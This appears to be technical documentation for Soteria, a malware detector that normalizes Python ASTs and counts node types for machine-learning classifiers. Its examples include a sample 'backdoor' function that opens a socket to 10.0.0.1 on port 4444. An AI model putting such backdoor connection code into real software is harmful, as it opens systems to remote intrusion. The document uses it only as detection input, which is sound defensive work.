Structural DNA & AST Normalization
Soteria’s detection engine is built on the philosophy that malicious behavior remains consistent in its structure, even when its appearance is obfuscated. To achieve this, the system moves beyond string-based pattern matching and instead analyzes the Abstract Syntax Tree (AST) of Python code to extract what we call "Structural DNA."
The Normalization Engine
The first step in the pipeline is Structural Normalization. Traditional security scanners can be bypassed by simply renaming variables or changing string literals. Soteria neutralizes this by using a custom ast.NodeTransformer subclass to anonymize the source code.
Anonymization Logic
The codeNormalizer (found in normalizer_AST.py) traverses the code’s syntax tree and replaces specific identifiers while preserving the logic flow. It handles three kinds of elements:
- Variable Names: All user-defined variables are mapped to a generic placeholder (e.g., var_1).
- Constants/Literals: Specific strings and numbers are neutralized to prevent the model from over-fitting on specific IPs or file paths.
- Function Calls: The structure of each call is preserved, so the analysis focuses on how the code interacts with modules and objects rather than on naming.
By reducing code to its skeletal structure, the engine becomes resistant to "Variable Renaming" and "Comment Injection" obfuscation techniques.
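The anonymization rules above can be illustrated with a small transformer. This is only a sketch under stated assumptions: SketchNormalizer, the "STR" and 0 replacement values, and the rule "rename a name only once it has been assigned" are hypothetical choices made for illustration, not the behavior of Soteria's codeNormalizer. It relies on ast.unparse, which requires Python 3.9 or later.

```python
import ast


class SketchNormalizer(ast.NodeTransformer):
    """Illustrative stand-in for a normalizer; not Soteria's codeNormalizer."""

    def __init__(self):
        self.names = {}  # original identifier -> placeholder

    def _placeholder(self, name):
        if name not in self.names:
            self.names[name] = f"var_{len(self.names) + 1}"
        return self.names[name]

    def visit_arg(self, node):
        # Function parameters count as user-defined names.
        node.arg = self._placeholder(node.arg)
        return node

    def visit_Name(self, node):
        # Rename a name when it is assigned, or when it was assigned earlier.
        # Names that are only read (modules, builtins) are left untouched.
        if isinstance(node.ctx, ast.Store) or node.id in self.names:
            node.id = self._placeholder(node.id)
        return node

    def visit_Constant(self, node):
        # Neutralize strings and numbers; keep True/False/None as they are.
        if isinstance(node.value, str):
            return ast.copy_location(ast.Constant(value="STR"), node)
        is_number = isinstance(node.value, (int, float, complex))
        if is_number and not isinstance(node.value, bool):
            return ast.copy_location(ast.Constant(value=0), node)
        return node


def normalize(source):
    """Parse, anonymize, and turn the tree back into source text."""
    tree = SketchNormalizer().visit(ast.parse(source))
    return ast.unparse(tree)


original = '''
def backdoor():
    s = socket.socket()
    s.connect(("10.0.0.1", 4444))
'''
renamed = '''
def backdoor():
    conn = socket.socket()
    conn.connect(("192.168.1.5", 9001))
'''
print(normalize(original))
print(normalize(original) == normalize(renamed))
```

In this sketch the two snippets differ only in variable name, IP address, and port, so they normalize to the same text, which is the property the paragraph above describes.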
Structural DNA Extraction
Once a function is normalized, it is converted into a numerical feature matrix—the Structural DNA. This matrix represents the frequency and distribution of specific Python AST nodes.
Feature Mapping
The system tracks the occurrence of various node types, including but not limited to:
- Assign: Variable assignments.
- Call: Function or method invocations.
- BinOp: Binary operations (e.g., addition, bitwise shifts).
- Attribute: Accessing object attributes (often used in malicious library imports).
- Import/ImportFrom: External dependency declarations.
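Counting node types is straightforward with the standard ast module. The following is a minimal sketch, assuming a fixed column order; TRACKED_NODES and node_counts are hypothetical names introduced here, and the real feature set may track more node types than the ones listed above.

```python
import ast
from collections import Counter

# Column order for the feature vector (an assumption for this sketch).
TRACKED_NODES = ["Assign", "Call", "BinOp", "Attribute", "Import", "ImportFrom"]


def node_counts(source):
    """Return how often each tracked AST node type occurs in the source."""
    tree = ast.parse(source)
    counts = Counter(type(node).__name__ for node in ast.walk(tree))
    return [counts[name] for name in TRACKED_NODES]


sample = """
import os

def run(cmd):
    full = "echo " + cmd
    os.system(full)
"""

row = node_counts(sample)
print(dict(zip(TRACKED_NODES, row)))
```

For this sample, each of Assign, Call, BinOp, Attribute, and Import occurs once, and ImportFrom does not occur.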
The Feature Matrix
This data is aggregated into a numericFeatures.csv file, which serves as the primary training input for the ML models.
| Node Type | Purpose in Detection |
| :--- | :--- |
| Call | High density often indicates shell execution or socket communication. |
| Attribute | Frequent attribute access (e.g., os.system) signals deep system interaction. |
| BinOp | Can indicate payload decryption or obfuscated string reconstruction. |
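As a rough illustration of how per-function counts could be aggregated into CSV rows, the sketch below writes to an in-memory buffer. The column layout, the "function" column, and the helper name feature_row are assumptions made for this example; the actual schema of numericFeatures.csv is not specified here.

```python
import ast
import csv
import io
from collections import Counter

# Hypothetical column layout; the real CSV schema may differ.
COLUMNS = ["Assign", "Call", "BinOp", "Attribute"]


def feature_row(name, source):
    """Build one CSV row of node-type counts for a single function."""
    counts = Counter(type(n).__name__ for n in ast.walk(ast.parse(source)))
    row = {"function": name}
    row.update({col: counts[col] for col in COLUMNS})
    return row


samples = {
    "backdoor": (
        "def backdoor():\n"
        "    s = socket.socket()\n"
        '    s.connect(("10.0.0.1", 4444))\n'
    ),
    "add": "def add(a, b):\n    return a + b\n",
}

buffer = io.StringIO()
writer = csv.DictWriter(buffer, fieldnames=["function"] + COLUMNS)
writer.writeheader()
for name, source in samples.items():
    writer.writerow(feature_row(name, source))

csv_text = buffer.getvalue()
print(csv_text)
```

To write a file instead of a buffer, the same writer can be given a handle from open("numericFeatures.csv", "w", newline="").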
The Data Pipeline
The dataPipeline_AST.py module manages the lifecycle of code analysis. It keeps the dataset free of duplicate samples and prepares functions for either training or real-time inference.
1. Function-Level Granularity
Soteria does not analyze files as monolithic blocks. Instead, it parses the file into an AST, identifies all FunctionDef nodes, and extracts them individually. This allows the system to pinpoint exactly which function within a large script contains malicious logic.
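Function-level extraction can be sketched with ast.walk and ast.get_source_segment (available since Python 3.8). The helper name extract_functions is hypothetical, and this sketch only collects FunctionDef nodes as described above; whether the real pipeline also handles AsyncFunctionDef or treats nested functions specially is not stated.

```python
import ast


def extract_functions(source):
    """Return (name, line number, source text) for every FunctionDef."""
    tree = ast.parse(source)
    found = []
    for node in ast.walk(tree):
        if isinstance(node, ast.FunctionDef):
            text = ast.get_source_segment(source, node)
            found.append((node.name, node.lineno, text))
    # ast.walk does not guarantee source order, so sort by line number.
    return sorted(found, key=lambda item: item[1])


script = '''import os

def helper(x):
    return x * 2

def cleanup(path):
    os.remove(path)
'''

functions = extract_functions(script)
for name, lineno, text in functions:
    print(f"{name} (line {lineno})")
```

Keeping the line number with each extracted function is what lets a report point at the exact location inside a larger script.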
2. Hardened Deduplication
To prevent dataset bias from repeated samples, the pipeline uses SHA-256 hashing. Before a function is added to the training set or scanned, its raw text is hashed:

    from hashlib import sha256

    def get_Code_Hash(codeText):
        """
        Generates a unique fingerprint to detect and skip
        duplicate functions in the dataset.
        """
        return sha256(codeText.encode('utf-8')).hexdigest()
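One way such a hash could be used to skip duplicates is with a set of digests already seen. This is a sketch only: the deduplicate helper is a hypothetical name, and how the pipeline actually stores seen hashes is not described here.

```python
from hashlib import sha256


def get_Code_Hash(codeText):
    """SHA-256 fingerprint of a function's text."""
    return sha256(codeText.encode("utf-8")).hexdigest()


def deduplicate(functions):
    """Keep the first occurrence of each function text, drop exact repeats."""
    seen = set()
    unique = []
    for code in functions:
        digest = get_Code_Hash(code)
        if digest in seen:
            continue  # identical text was already collected
        seen.add(digest)
        unique.append(code)
    return unique


collected = [
    "def a():\n    return 1\n",
    "def b():\n    return 2\n",
    "def a():\n    return 1\n",  # exact duplicate of the first entry
]
unique = deduplicate(collected)
print(len(collected), "->", len(unique))
```

Because the hash is computed over the text, only byte-identical functions collapse into one entry; copies that differ in whitespace or naming produce different digests.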
3. Integration with Machine Learning
The normalized AST data flows into a multi-stage model architecture:
- Ensemble Classifier: Combines Random Forest and Gradient Boosting to analyze node distributions.
- Neural Network: A PyTorch-based deep learning model (VulnerabilityNet) that identifies complex, non-linear relationships between AST nodes.
- Hybrid Stacking: The final decision engine that weights the outputs of both the structure-based ensemble and the neural feature extractor.
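The idea of weighting two model outputs can be illustrated with a simple weighted blend of probabilities. This is a deliberately simplified sketch and not the project's decision engine: the function names, the default weight, and the threshold are all hypothetical, and a true stacking setup would typically learn the combination from held-out predictions rather than use a fixed weight.

```python
def blend_scores(p_ensemble, p_neural, w_ensemble=0.5):
    """Weighted average of two malicious-probability estimates.

    w_ensemble is the (assumed) weight given to the ensemble classifier;
    the neural network receives the remainder.
    """
    if not 0.0 <= w_ensemble <= 1.0:
        raise ValueError("w_ensemble must be between 0 and 1")
    return w_ensemble * p_ensemble + (1.0 - w_ensemble) * p_neural


def is_malicious(p_ensemble, p_neural, w_ensemble=0.5, threshold=0.5):
    """Flag a function when the blended score reaches the threshold."""
    return blend_scores(p_ensemble, p_neural, w_ensemble) >= threshold


# Placeholder probabilities chosen for illustration, not real model output.
print(is_malicious(0.9, 0.3))
print(is_malicious(0.2, 0.4))
```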
Usage Example
To process code through the normalization pipeline programmatically:

    import ast
    from normalizer_AST import codeNormalizer

    # Sample malicious snippet
    raw_code = """
    def backdoor():
        s = socket.socket()
        s.connect(("10.0.0.1", 4444))
    """

    # Parse and normalize
    tree = ast.parse(raw_code)
    normalizer = codeNormalizer()
    normalized_tree = normalizer.visit(tree)

    # Convert back to code for inspection (ast.unparse requires Python 3.9+)
    clean_logic = ast.unparse(normalized_tree)
    print(clean_logic)
    # Output will show generic variable names but preserved 'socket' calls.
By focusing on the AST rather than the source text, Soteria identifies the inherent "shape" of an attack, providing a layer of defense that stays effective when surface details such as names and literals are changed.